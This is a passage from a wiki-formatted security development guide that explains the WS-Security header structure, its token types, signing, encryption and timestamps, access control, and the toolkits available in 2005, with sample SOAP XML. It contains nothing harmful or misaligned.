WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
         &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
         &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
    &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;soap:Body&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
     &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Header&amp;gt;&lt;br /&gt;
     &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... &lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;&lt;br /&gt;
         &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;  &lt;br /&gt;
 	&amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:CipherValue&amp;gt;Nb0Mf...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
   	&amp;lt;xenc:ReferenceList&amp;gt;&lt;br /&gt;
   	  &amp;lt;xenc:DataReference URI=&amp;quot;#aDNa2iD&amp;quot;/&amp;gt;&lt;br /&gt;
   	&amp;lt;/xenc:ReferenceList&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:EncryptedKey&amp;gt;&lt;br /&gt;
       &amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sG&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt; 1106844369755&amp;lt;/wsse:KeyIdentifier&amp;gt;&lt;br /&gt;
       &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
       &amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
       &amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
       &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;&lt;br /&gt;
 	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;&lt;br /&gt;
      &amp;lt;/wsu:Timestamp&amp;gt;&lt;br /&gt;
       &amp;lt;dsig:Signature xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot; Id=&amp;quot;sb738c7&amp;quot;&amp;gt;&lt;br /&gt;
 	&amp;lt;dsig:SignedInfo Id=&amp;quot;obLkHzaCOrAW4kxC9az0bLA22&amp;quot;&amp;gt;&lt;br /&gt;
 		...&lt;br /&gt;
 	  &amp;lt;dsig:Reference URI=&amp;quot;#s91397860&amp;quot;&amp;gt;&lt;br /&gt;
 		...									&lt;br /&gt;
             &amp;lt;dsig:DigestValue&amp;gt;5R3GSp+OOn17lSdE0knq4GXqgYM=&amp;lt;/dsig:DigestValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:Reference&amp;gt;&lt;br /&gt;
 	  &amp;lt;/dsig:SignedInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:SignatureValue Id=&amp;quot;a9utKU9UZk&amp;quot;&amp;gt;LIkagbCr5bkXLs8l...&amp;lt;/dsig:SignatureValue&amp;gt;&lt;br /&gt;
 	  &amp;lt;dsig:KeyInfo&amp;gt;&lt;br /&gt;
 	  &amp;lt;wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
 	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;&lt;br /&gt;
 	  &amp;lt;/wsse:SecurityTokenReference&amp;gt;&lt;br /&gt;
         &amp;lt;/dsig:KeyInfo&amp;gt;&lt;br /&gt;
       &amp;lt;/dsig:Signature&amp;gt;&lt;br /&gt;
     &amp;lt;/wsse:Security&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Header&amp;gt;&lt;br /&gt;
   &amp;lt;soap:Body xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; wsu:Id=&amp;quot;s91397860&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xenc:EncryptedData xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot; Id=&amp;quot;aDNa2iD&amp;quot; Type=&amp;quot;http://www.w3.org/2001/04/xmlenc#Content&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#tripledes-cbc&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;xenc:CipherData&amp;gt;&lt;br /&gt;
 	&amp;lt;xenc:CipherValue&amp;gt;XFM4J6C...&amp;lt;/xenc:CipherValue&amp;gt;&lt;br /&gt;
       &amp;lt;/xenc:CipherData&amp;gt;&lt;br /&gt;
     &amp;lt;/xenc:EncryptedData&amp;gt;&lt;br /&gt;
   &amp;lt;/soap:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/soap:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Types of tokens ===&lt;br /&gt;
&lt;br /&gt;
A WSS Header may have the following types of security tokens in it:&lt;br /&gt;
&lt;br /&gt;
* Username token&lt;br /&gt;
&lt;br /&gt;
Defines mechanisms to pass username and, optionally, a password - the latter is described in the username profile document. Unless the whole token is encrypted, a message which includes a clear-text password should always be transmitted via a secured channel. In situations where the target Web Service has access to clear-text passwords for verification (this might not be possible with LDAP or some other user directories, which do not return clear-text passwords), using a hashed version with nonce and a timestamp is generally preferable. The profile document defines an unambiguous algorithm for producing password hash: &lt;br /&gt;
&lt;br /&gt;
 Password_Digest = Base64 ( SHA-1 ( nonce + created + password ) )&lt;br /&gt;
&lt;br /&gt;
* Binary token&lt;br /&gt;
&lt;br /&gt;
They are used to convey binary data, such as X.509 certificates, in a text-encoded format, Base64 by default. The core specification defines BinarySecurityToken element, while profile documents specify additional attributes and sub-elements to handle attachment of various tokens. Presently, both the X.509 and the Kerberos profiles have been adopted.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
       &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;&lt;br /&gt;
         MIICtzCCAi...&lt;br /&gt;
       &amp;lt;/wsse:BinarySecurityToken&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* XML token&lt;br /&gt;
&lt;br /&gt;
These are meant for any kind of XML-based tokens, but primarily – for SAML assertions. The core specification merely mentions the possibility of inserting such tokens, leaving all details to the profile documents. At the moment, SAML 1.1 profile has been accepted by OASIS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 	&amp;lt;saml:Assertion AssertionID=&amp;quot;1106844369755&amp;quot; IssueInstant=&amp;quot;2005-01-27T16:46:09.755Z&amp;quot; Issuer=&amp;quot;www.my.com&amp;quot; MajorVersion=&amp;quot;1&amp;quot; MinorVersion=&amp;quot;1&amp;quot; xmlns:saml=&amp;quot;urn:oasis:names:tc:SAML:1.0:assertion&amp;quot;&amp;gt;&lt;br /&gt;
 		...				&lt;br /&gt;
 	&amp;lt;/saml:Assertion&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Although technically it is not a security token, a Timestamp element may be inserted into a security header to ensure message’s freshness. See the further reading section for a design pattern on this.&lt;br /&gt;
&lt;br /&gt;
===Referencing message parts ===&lt;br /&gt;
&lt;br /&gt;
In order to retrieve security tokens, passed in the message, or to identify signed and encrypted message parts, the core specification adopts usage of a special attribute, wsu:Id. The only requirement on this attribute is that the values of such IDs should be unique within the scope of XML document where they are defined. Its application has a significant advantage for the intermediate processors, as it does not require understanding of the message’s XML Schema. Unfortunately, XML Signature and Encryption specifications do not allow for attribute extensibility (i.e. they have closed schema), so, when trying to locate signature or encryption elements, local IDs of the Signature and Encryption elements must be considered first.&lt;br /&gt;
&lt;br /&gt;
WSS core specification also defines a general mechanism for referencing security tokens via SecurityTokenReference element. An example of such element, referring to a SAML assertion in the same header, is provided below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsse:SecurityTokenReference wsu:Id=&amp;quot;aZG0sGbRpXLySzgM1X6aSjg22&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:KeyIdentifier ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID&amp;quot; wsu:Id=&amp;quot;a2tv1Uz&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''            1106844369755''&lt;br /&gt;
&lt;br /&gt;
''          &amp;lt;/wsse:KeyIdentifier&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;/wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
As this element was designed to refer to pretty much any possible token type (including encryption keys, certificates, SAML assertions, etc) both internal and external to the WSS Header, it is enormously complicated. The specification recommends using two of its possible four reference types – Direct References (by URI) and Key Identifiers (some kind of token identifier). Profile documents (SAML, X.509 for instance) provide additional extensions to these mechanisms to take advantage of specific qualities of different token types.&lt;br /&gt;
&lt;br /&gt;
==Communication Protection Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
As was already explained earlier (see 0), channel security, while providing important services, is not a panacea, as it does not solve many of the issues facing Web Service developers. WSS helps addressing some of them at the SOAP message level, using the mechanisms described in the sections below.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Integrity ===&lt;br /&gt;
&lt;br /&gt;
WSS specification makes use of the XML-dsig standard to ensure message integrity, restricting its functionality in certain cases; for instance, only explicitly referenced elements can be signed (i.e. no Embedding or Embedded signature modes are allowed). Prior to signing an XML document, a transformation is required to create its canonical representation, taking into account the fact that XML documents can be represented in a number of semantically equivalent ways. There are two main transformations defined by the XML Digital Signature WG at W3C, Inclusive and Exclusive Canonicalization Transforms (C14N and EXC-C14N), which differ in the way namespace declarations are processed. The WSS core specification specifically recommends using EXC-C14N, as it allows copying signed XML content into other documents without invalidating the signature.&lt;br /&gt;
&lt;br /&gt;
In order to provide a uniform way of addressing signed tokens, WSS adds a Security Token Reference (STR) Dereference Transform option, which is comparable with dereferencing a pointer to an object of specific data type in programming languages. Similarly, in addition to the XML Signature-defined ways of addressing signing keys, WSS allows for references to signing security tokens through the STR mechanism (explained in 0), extended by token profiles to accommodate specific token types. A typical signature example is shown in an earlier sample in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
Typically, an XML signature is applied to secure elements such as SOAP Body and the timestamp, as well as any user credentials, passed in the request. There is an interesting twist when a particular element is both signed and encrypted, since these operations may follow (even repeatedly) in any order, and knowledge of their ordering is required for signature verification. To address this issue, the WSS core specification requires that each new element is pre-pended to the security header, thus defining the “natural” order of operations. A particularly nasty problem arises when there are several security headers in a single SOAP message, using overlapping signature and encryption blocks, as there is nothing in this case that would point to the right order of operations.&lt;br /&gt;
&lt;br /&gt;
===Confidentiality ===&lt;br /&gt;
&lt;br /&gt;
For its confidentiality protection, WSS relies on yet another standard, XML Encryption. Similarly to XML-dsig, this standard operates on selected elements of the SOAP message, but it then replaces the encrypted element’s data with a &amp;lt;xenc:EncryptedData&amp;gt; sub-element carrying the encrypted bytes. For encryption efficiency, the specification recommends using a unique key, which is then encrypted by the recipient’s public key and pre-pended to the security header in a &amp;lt;xenc:EncryptedKey&amp;gt; element. A SOAP message with encrypted body is shown in the section 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Freshness ===&lt;br /&gt;
&lt;br /&gt;
SOAP messages’ freshness is addressed via timestamp mechanism – each security header may contain just one such element, which states, in UTC time and using the UTC time format, creation and expiration moments of the security header. It is important to realize that the timestamp is applied to the WSS Header, not to the SOAP message itself, since the latter may contain multiple security headers, each with a different timestamp. There is an unresolved problem with this “single timestampt” approach, since, once the timestamp is created and signed, it is impossible to update it without breaking existing signatures, even in case of a legitimate change in the WSS Header.&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsu:Timestamp wsu:Id=&amp;quot;afc6fbe-a7d8-fbf3-9ac4-f884f435a9c1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Created&amp;gt;2005-01-27T16:46:10Z&amp;lt;/wsu:Created&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;wsu:Expires&amp;gt;2005-01-27T18:46:10Z&amp;lt;/wsu:Expires&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsu:Timestamp&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
If a timestamp is included in a message, it is typically signed to prevent tampering and replay attacks. There is no mechanism foreseen to address clock synchronization issue (which, as was already point out earlier, is generally not an issue in modern day systems) – this has to be addressed out-of-band as far as the WSS mechanics is concerned. See the further reading section for a design pattern addressing this issue.&lt;br /&gt;
&lt;br /&gt;
==Access Control Mechanisms ==&lt;br /&gt;
&lt;br /&gt;
When it comes to access control decisions, Web Services do not offer specific protection mechanisms by themselves – they just have the means to carry the tokens and data payloads in a secure manner between source and destination SOAP endpoints. &lt;br /&gt;
&lt;br /&gt;
For more complete description of access control tasks, please, refer to other sections of this Development Guide.&lt;br /&gt;
&lt;br /&gt;
===Identification ===&lt;br /&gt;
&lt;br /&gt;
Identification represents a claim to have certain identity, which is expressed by attaching certain information to the message. This can be a username, an SAML assertion, a Kerberos ticket, or any other piece of information, from which the service can infer who the caller claims to be. &lt;br /&gt;
&lt;br /&gt;
WSS represents a very good way to convey this information, as it defines an extensible mechanism for attaching various token types to a message (see 0). It is the receiver’s job to extract the attached token and figure out which identity it carries, or to reject the message if it can find no acceptable token in it.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Authentication ===&lt;br /&gt;
&lt;br /&gt;
Authentication can come in two flavors – credentials verification or token validation. The subtle difference between the two is that tokens are issued after some kind of authentication has already happened prior to the current invocation, and they usually contain user’s identity along with the proof of its integrity. &lt;br /&gt;
&lt;br /&gt;
WSS offers support for a number of standard authentication protocols by defining binding mechanism for transmitting protocol-specific tokens and reliably linking them to the sender. However, the mechanics of proof that the caller is who he claims to be is completely at the Web Service’s discretion. Whether it takes the supplied username and password’s hash and checks it against the backend user store, or extracts subject name from the X.509 certificate used for signing the message, verifies the certificate chain and looks up the user in its store – at the moment, there are no requirements or standards which would dictate that it should be done one way or another. &lt;br /&gt;
&lt;br /&gt;
===Authorization ===&lt;br /&gt;
&lt;br /&gt;
XACML may be used for expressing authorization rules, but its usage is not Web Service-specific – it has much broader scope. So, whatever policy or role-based authorization mechanism the host server already has in place will most likely be utilized to protect the deployed Web Services deployed as well. &lt;br /&gt;
&lt;br /&gt;
Depending on the implementation, there may be several layers of authorization involved at the server. For instance, JSRs 224 (JAX-RPC 2.0) and 109 (Implementing Enterprise Web Services), which define Java binding for Web Services, specify implementing Web Services in J2EE containers. This means that when a Web Service is accessed, there will be a URL authorization check executed by the J2EE container, followed by a check at the Web Service layer for the Web Service-specific resource. Granularity of such checks is implementation-specific and is not dictated by any standards. In the Windows universe it happens in a similar fashion, since IIS is going to execute its access checks on the incoming HTTP calls before they reach the ASP.NET runtime, where SOAP message is going to be further decomposed and analyzed.&lt;br /&gt;
&lt;br /&gt;
===Policy Agreement ===&lt;br /&gt;
&lt;br /&gt;
Normally, Web Services’ communication is based on the endpoint’s public interface, defined in its WSDL file. This descriptor has sufficient details to express SOAP binding requirements, but it does not define any security parameters, leaving Web Service developers struggling to find out-of-band mechanisms to determine the endpoint’s security requirements. &lt;br /&gt;
&lt;br /&gt;
To make up for these shortcomings, WS-Policy specification was conceived as a mechanism for expressing complex policy requirements and qualities, sort of WSDL on steroids. Through the published policy SOAP endpoints can advertise their security requirements, and their clients can apply appropriate measures of message protection to construct the requests. The general WS-Policy specification (actually comprised of three separate documents) also has extensions for specific policy types, one of them – for security, WS-SecurityPolicy.&lt;br /&gt;
&lt;br /&gt;
If the requestor does not possess the required tokens, it can try obtaining them via trust mechanism, using WS-Trust-enabled services, which are called to securely exchange various token types for the requested identity. &lt;br /&gt;
&lt;br /&gt;
[[Image: Using Trust Service.gif|Figure 5. Using Trust service]]&lt;br /&gt;
&lt;br /&gt;
Unfortunately, both WS-Policy and WS-Trust specifications have not been submitted for standardization to public bodies, and their development is progressing via private collaboration of several companies, although it was opened up for other participants as well. As a positive factor, there have been several interoperability events conducted for these specifications, so the development process of these critical links in the Web Services’ security infrastructure is not a complete black box.&lt;br /&gt;
&lt;br /&gt;
==Forming Web Service Chains ==&lt;br /&gt;
&lt;br /&gt;
Many existing or planned implementations of SOA or B2B systems rely on dynamic chains of Web Services for accomplishing various business specific tasks, from taking the orders through manufacturing and up to the distribution process. &lt;br /&gt;
&lt;br /&gt;
[[Image:Service Chain.gif|Figure 6: Service chain]]&lt;br /&gt;
&lt;br /&gt;
This is in theory. In practice, there are a lot of obstacles hidden among the way, and one of the major ones among them – security concerns about publicly exposing processing functions to intra- or Internet-based clients. &lt;br /&gt;
&lt;br /&gt;
Here are just a few of the issues that hamper Web Services interaction – incompatible authentication and authorization models for users, amount of trust between services themselves and ways of establishing such trust, maintaining secure connections, and synchronization of user directories or otherwise exchanging users’ attributes. These issues will be briefly tackled in the following paragraphs.&lt;br /&gt;
&lt;br /&gt;
===Incompatible user access control models ===&lt;br /&gt;
&lt;br /&gt;
As explained earlier, in section 0, Web Services themselves do not include separate extensions for access control, relying instead on the existing security framework. What they do provide, however, are mechanisms for discovering and describing security requirements of a SOAP service (via WS-Policy), and for obtaining appropriate security credentials via WS-Trust based services.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Service trust ===&lt;br /&gt;
&lt;br /&gt;
In order to establish mutual trust between client and service, they have to satisfy each other’s policy requirements. A simple and popular model is mutual certificate authentication via SSL, but it is not scalable for open service models, and supports only one authentication type. Services that require more flexibility have to use pretty much the same access control mechanisms as with users to establish each other’s identities prior to engaging in a conversation.&lt;br /&gt;
&lt;br /&gt;
===Secure connections ===&lt;br /&gt;
&lt;br /&gt;
Once trust is established it would be impractical to require its confirmation on each interaction. Instead, a secure client-server link is formed and maintained the entire time a client’s session is active. Again, the most popular mechanism today for maintaining such link is SSL, but it is not a Web Service-specific mechanism, and it has a number of shortcomings when applied to SOAP communication, as explained in 0.&lt;br /&gt;
[[Category:FIXME|Please check the reference (see 0)]]&lt;br /&gt;
&lt;br /&gt;
===Synchronization of user directories ===&lt;br /&gt;
&lt;br /&gt;
This is a very acute problem when dealing with cross-domain applications, as users’ population tends to change frequently among different domains. So, how does a service in domain B decide whether it is going to trust user’s claim that he has been already authenticated in domain A? There exist different aspects of this problem. First – a common SSO mechanism, which implies that a user is known in both domains (through synchronization, or by some other means), and authentication tokens from one domain are acceptable in another. In Web Services world, this would be accomplished by passing around a SAML or Kerberos token for a user. &lt;br /&gt;
&lt;br /&gt;
===Domain federation ===&lt;br /&gt;
&lt;br /&gt;
Another aspect of the problem is when users are not shared across domains, but merely the fact that a user with certain ID has successfully authenticated in another domain, as would be the case with several large corporations, which would like to form a partnership, but would be reluctant to share customers’ details. The decision to accept this request is then based on the inter-domain procedures, establishing special trust relationships and allowing for exchanging such opaque tokens, which would be an example of Federation relationships. Of those efforts, most notable example is Liberty Alliance project, which is now being used as a basis for SAML 2.0 specifications. The work in this area is still far from being completed, and most of the existing deployments are nothing more than POC or internal pilot projects than to real cross-companies deployments, although LA’s website does list some case studies of large-scale projects.&lt;br /&gt;
&lt;br /&gt;
==Available Implementations ==&lt;br /&gt;
&lt;br /&gt;
It is important to realize from the beginning that no security standard by itself is going to provide security to the message exchanges – it is the installed implementations, which will be assessing conformance of the incoming SOAP messages to the applicable standards, as well as appropriately securing the outgoing messages.&lt;br /&gt;
&lt;br /&gt;
===.NET – Web Service Extensions ===&lt;br /&gt;
&lt;br /&gt;
Since new standards are being developed at a rather quick pace, .NET platform is not trying to catch up immediately, but uses Web Service Extensions (WSE) instead. WSE, currently at the version 2.0, adds development and runtime support for the latest Web Service security standards to the platform and development tools, even while they are still “work in progress”. Once standards mature, their support is incorporated into new releases of the .NET platform, which is what is going to happen when .NET 2.0 finally sees the world. The next release of WSE, 3.0, is going to coincide with VS.2005 release and will take advantages of the latest innovations of .NET 2.0 platform in messaging and Web Application areas.&lt;br /&gt;
&lt;br /&gt;
Considering that Microsoft is one of the most active players in the Web Service security area and recognizing its influence in the industry, its WSE implementation is probably one of the most complete and up to date, and it is strongly advisable to run at least a quick interoperability check with WSE-secured .NET Web Service clients. If you have a Java-based Web Service, and the interoperability is a requirement (which is usually the case), in addition to the questions of security testing one needs to keep in mind the basic interoperability between Java and .NET Web Service data structures. &lt;br /&gt;
&lt;br /&gt;
This is especially important since current versions of .NET Web Service tools frequently do not cleanly handle WS-Security’s and related XML schemas as published by OASIS, so some creativity on the part of a Web Service designer is needed. That said – WSE package itself contains very rich and well-structured functionality, which can be utilized both with ASP.NET-based and standalone Web Service clients to check incoming SOAP messages and secure outgoing ones at the infrastructure level, relieving Web Service programmers from knowing these details. Among other things, WSE 2.0 supports the most recent set of WS-Policy and WS-Security profiles, providing for basic message security and WS-Trust with WS-SecureConversation. Those are needed for establishing secure exchanges and sessions - similar to what SSL does at the transport level, but applied to message-based communication.&lt;br /&gt;
&lt;br /&gt;
===Java toolkits ===&lt;br /&gt;
&lt;br /&gt;
Most of the publicly available Java toolkits work at the level of XML security, i.e. XML-dsig and XML-enc – such as IBM’s XML Security Suite and Apache’s XML Security Java project. Java’s JSR 105 and JSR 106 (still not finalized) define Java bindings for signatures and encryption, which will allow plugging the implementations as JCA providers once work on those JSRs is completed. &lt;br /&gt;
&lt;br /&gt;
Moving one level up, to address Web Services themselves, the picture becomes muddier – at the moment, there are many implementations in various stages of incompleteness. For instance, Apache is currently working on the WSS4J project, which is moving rather slowly, and there is commercial software package from Phaos (now owned by Oracle), which suffers from a lot of implementation problems.&lt;br /&gt;
&lt;br /&gt;
A popular choice among Web Service developers today is Sun’s JWSDP, which includes support for Web Service security. However, its support for Web Service security specifications in the version 1.5 is only limited to implementation of the core WSS standard with username and X.509 certificate profiles. Security features are implemented as part of the JAX-RPC framework and configuration-driven, which allows for clean separation from the Web Service’s implementation.&lt;br /&gt;
&lt;br /&gt;
===Hardware, software systems ===&lt;br /&gt;
&lt;br /&gt;
This category includes complete systems, rather than toolkits or frameworks. On one hand, they usually provide rich functionality right off the shelf, on the other hand – its usage model is rigidly constrained by the solution’s architecture and implementation. This is in contrast to the toolkits, which do not provide any services by themselves, but handing system developers necessary tools to include the desired Web Service security features in their products… or to shoot themselves in the foot by applying them inappropriately.&lt;br /&gt;
&lt;br /&gt;
These systems can be used at the infrastructure layer to verify incoming messages against the effective policy, check signatures, tokens, etc, before passing them on to the target Web Service. When applied to the outgoing SOAP messages, they act as a proxy, now altering the messages to decorate with the required security elements, sign and/or encrypt them.&lt;br /&gt;
&lt;br /&gt;
Software systems are characterized by significant configuration flexibility, but comparatively slow processing. On the bright side, they often provide high level of integration with the existing enterprise infrastructure, relying on the back-end user and policy stores to look at the credentials, extracted from the WSS header, from the broader perspective. An example of such service is TransactionMinder from the former Netegrity – a Policy Enforcement Point for Web Services behind it, layered on top of the Policy Server, which makes policy decisions by checking the extracted credentials against the configured stores and policies.&lt;br /&gt;
&lt;br /&gt;
